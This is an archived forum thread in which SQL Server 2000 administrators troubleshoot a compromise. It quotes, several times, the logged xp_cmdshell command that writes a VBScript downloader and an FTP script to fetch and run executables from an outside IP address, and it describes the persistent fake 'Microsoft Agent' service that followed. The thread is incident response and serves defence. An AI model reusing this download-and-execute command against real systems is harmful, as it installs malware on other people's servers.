I have discovered recently that the sql server 2000 sp4 has spawned a lot of
cmd.exe processes.
Event viewer is full of events like:
8128 :
Using 'xplog70.dll' version '2000.80.760' to execute extended stored
procedure 'xp_cmdshell'.
the parameter cmd,exe was called:
C:\WINDOWS\system32\cmd.exe /c echo dim HTTPGET>c:\1.vbs&echo dim Data>>c:\1.
vbs&echo dim ExeURL>>c:\1.vbs&echo dim LocalPath>>c:\1.vbs&echo.>>c:\1.
vbs&echo ExeURL = "http://172.22.21.181:9843/84785_mssql.exe">>c:\1.vbs&echo
LocalPath = "c:\msagent.exe">>c:\1.vbs&echo.>>c:\1.vbs&echo Set HTTPGET = CreateObject("Microsoft" ^& chr(46) ^& "XMLHTTP")>>c:\1.vbs&echo Set Data = CreateObject("ADODB" ^& chr(46) ^& "Stream")>>c:\1.vbs&echo.>>c:\1.vbs&echo
HTTPGET.Open "GET", ExeURL, false>>c:\1.vbs&echo HTTPGET.Send>>c:\1.vbs&echo.
>>c:\1.vbs&echo Const adTypeBinary = ^1>>c:\1.vbs&echo Const
adSaveCreateOverWrite = ^2>>c:\1.vbs&echo.>>c:\1.vbs&echo Data.Type = adTypeBinary>>c:\1.vbs&echo Data.Open>>c:\1.vbs&echo Data.Write HTTPGET.
ResponseBody>>c:\1.vbs&echo Data.SaveToFile LocalPath,
adSaveCreateOverWrite>>c:\1.vbs&cscript //Nologo /B c:\1.vbs&del c:\1.
vbs&start c:\msagent.exe&echo open 172.22.21.181 17534>x&echo get 27031_mssql.
exe>>x&echo quit>>x&ftp -n -s:x&27031_mssql.exe&del x&exit
now i'm out of mind how to stop this.
Can anyone help me?SQL Server does not do this by itself. It is either a job or some application that does this. I
suggest you use Profiler to track down who is calling these xp_cmdshell executions.
--
Tibor Karaszi, SQL Server MVP
http://www.karaszi.com/sqlserver/default.asp
http://www.solidqualitylearning.com/
"bass_ua" <u30195@.uwe> wrote in message news:6ab4e8b03613c@.uwe...
>I have discovered recently that the sql server 2000 sp4 has spawned a lot of
> cmd.exe processes.
> Event viewer is full of events like:
> 8128 :
> Using 'xplog70.dll' version '2000.80.760' to execute extended stored
> procedure 'xp_cmdshell'.
> the parameter cmd,exe was called:
> C:\WINDOWS\system32\cmd.exe /c echo dim HTTPGET>c:\1.vbs&echo dim Data>>c:\1.
> vbs&echo dim ExeURL>>c:\1.vbs&echo dim LocalPath>>c:\1.vbs&echo.>>c:\1.
> vbs&echo ExeURL = ">c:/1.vbs&echo">http://172.22.21.181:9843/84785_mssql.exe">>c:\1.vbs&echo
> LocalPath = "c:\msagent.exe">>c:\1.vbs&echo.>>c:\1.vbs&echo Set HTTPGET => CreateObject("Microsoft" ^& chr(46) ^& "XMLHTTP")>>c:\1.vbs&echo Set Data => CreateObject("ADODB" ^& chr(46) ^& "Stream")>>c:\1.vbs&echo.>>c:\1.vbs&echo
> HTTPGET.Open "GET", ExeURL, false>>c:\1.vbs&echo HTTPGET.Send>>c:\1.vbs&echo.
>>c:\1.vbs&echo Const adTypeBinary = ^1>>c:\1.vbs&echo Const
> adSaveCreateOverWrite = ^2>>c:\1.vbs&echo.>>c:\1.vbs&echo Data.Type => adTypeBinary>>c:\1.vbs&echo Data.Open>>c:\1.vbs&echo Data.Write HTTPGET.
> ResponseBody>>c:\1.vbs&echo Data.SaveToFile LocalPath,
> adSaveCreateOverWrite>>c:\1.vbs&cscript //Nologo /B c:\1.vbs&del c:\1.
> vbs&start c:\msagent.exe&echo open 172.22.21.181 17534>x&echo get 27031_mssql.
> exe>>x&echo quit>>x&ftp -n -s:x&27031_mssql.exe&del x&exit
> now i'm out of mind how to stop this.
> Can anyone help me?
>|||"Tibor Karaszi" <tibor_please.no.email_karaszi@.hotmail.nomail.com> wrote in
message news:OtyZQntHHHA.2632@.TK2MSFTNGP06.phx.gbl...
> SQL Server does not do this by itself. It is either a job or some
> application that does this. I suggest you use Profiler to track down who
> is calling these xp_cmdshell executions.
'TRACK DOWN' ...is this a police action'
Ok, Rac uses xp_cmdshell and regularly. What do you want to do about it! ?
You wanna come and get me? You gonna bring the MVP brigade? Armed?
Well I'll be waiting for ya. I'm not frightened by the shell game.
-:)
best wishes for the holidays,
steve|||LOL
Bring it on, Steve. ;-)
> Ok, Rac uses xp_cmdshell and regularly.
Ahh, I didn't know that. You think this one was RAC? I tend to be suspicious when I see a lot of
xp_cmdshell calls, but that it not the same as saying that there aren't good/smart/valid reasons to
use it.
> best wishes for the holidays,
And the same to you! :-)
--
Tibor Karaszi, SQL Server MVP
http://www.karaszi.com/sqlserver/default.asp
http://www.solidqualitylearning.com/
"Steve Dassin" <steve@.nospamrac4sql.net> wrote in message
news:uK8aDjwHHHA.1264@.TK2MSFTNGP06.phx.gbl...
> "Tibor Karaszi" <tibor_please.no.email_karaszi@.hotmail.nomail.com> wrote in message
> news:OtyZQntHHHA.2632@.TK2MSFTNGP06.phx.gbl...
>> SQL Server does not do this by itself. It is either a job or some application that does this. I
>> suggest you use Profiler to track down who is calling these xp_cmdshell executions.
> 'TRACK DOWN' ...is this a police action'
> Ok, Rac uses xp_cmdshell and regularly. What do you want to do about it! ?
> You wanna come and get me? You gonna bring the MVP brigade? Armed?
> Well I'll be waiting for ya. I'm not frightened by the shell game.
>
> -:)
> best wishes for the holidays,
> steve
>|||We have a SQL server exhibiting odd behavior too with the trouble starting on
Monday. We are also seeing the same xpCMevents in our logs. Multiple
instances of CMD.exe and FTP.exe had been running under the SYSTEM account
but I didn't get the parameters like you did.
We did however find a bunch of "84785_mssql[x].exe" (where x is a number) in
the temporary internet files directory of the Default User profile. The
files were all 258 KB in size. We found a new service had been added to the
machine, "Microsoft Agent", that was running
"%system%\system32\dllcache\BNCHOST.exe" (which is a protected system folder)
but I haven't been able to find any info on it yet. BNCHOST.exe is also 258
KB and when deleted, it eventually comes back. It just so happens that the
modify date on the new BNCHOST.exe always matches the date on one of the
84785_mssql[x].exe files. I popped both files open with a hex editor and
they are definitely the same file. The file starts with "MZLoveboom PE L
ByDwing!" Google searches showed other MZ... files ByDwing but nothing
exactly the same.
Once we disabled the "Microsoft Agent" service, the performance problems
stopped and the machine has remained fairly stable. We aren't out of the
woods though, because we still don't know what happened and as of four hours
ago, BNCHOST.exe was still regenerating itself.
I will post more as I see it. Let me know if you see the same "Microsoft
Agent" service, BNCHOST.exe or 84785_mssql[x].exe in your Temporary Internet
Files.
Good luck!
"bass_ua" wrote:
> I have discovered recently that the sql server 2000 sp4 has spawned a lot of
> cmd.exe processes.
> Event viewer is full of events like:
> 8128 :
> Using 'xplog70.dll' version '2000.80.760' to execute extended stored
> procedure 'xp_cmdshell'.
> the parameter cmd,exe was called:
> C:\WINDOWS\system32\cmd.exe /c echo dim HTTPGET>c:\1.vbs&echo dim Data>>c:\1.
> vbs&echo dim ExeURL>>c:\1.vbs&echo dim LocalPath>>c:\1.vbs&echo.>>c:\1.
> vbs&echo ExeURL = ">c:/1.vbs&echo">http://172.22.21.181:9843/84785_mssql.exe">>c:\1.vbs&echo
> LocalPath = "c:\msagent.exe">>c:\1.vbs&echo.>>c:\1.vbs&echo Set HTTPGET => CreateObject("Microsoft" ^& chr(46) ^& "XMLHTTP")>>c:\1.vbs&echo Set Data => CreateObject("ADODB" ^& chr(46) ^& "Stream")>>c:\1.vbs&echo.>>c:\1.vbs&echo
> HTTPGET.Open "GET", ExeURL, false>>c:\1.vbs&echo HTTPGET.Send>>c:\1.vbs&echo.
> >>c:\1.vbs&echo Const adTypeBinary = ^1>>c:\1.vbs&echo Const
> adSaveCreateOverWrite = ^2>>c:\1.vbs&echo.>>c:\1.vbs&echo Data.Type => adTypeBinary>>c:\1.vbs&echo Data.Open>>c:\1.vbs&echo Data.Write HTTPGET.
> ResponseBody>>c:\1.vbs&echo Data.SaveToFile LocalPath,
> adSaveCreateOverWrite>>c:\1.vbs&cscript //Nologo /B c:\1.vbs&del c:\1.
> vbs&start c:\msagent.exe&echo open 172.22.21.181 17534>x&echo get 27031_mssql.
> exe>>x&echo quit>>x&ftp -n -s:x&27031_mssql.exe&del x&exit
> now i'm out of mind how to stop this.
> Can anyone help me?
>|||Hi all, I'm fighting with exactly the same problem on my server. I'v
tried everything I know without success. Do someone have an idea abou
solving the problem ? Thanks
Marzi
--
Marzio Molinar
----
Marzio Molinari's Profile: http://unixadmintalk.com/79
View this thread: http://unixadmintalk.com/showthread.php?t=25483
No comments:
Post a Comment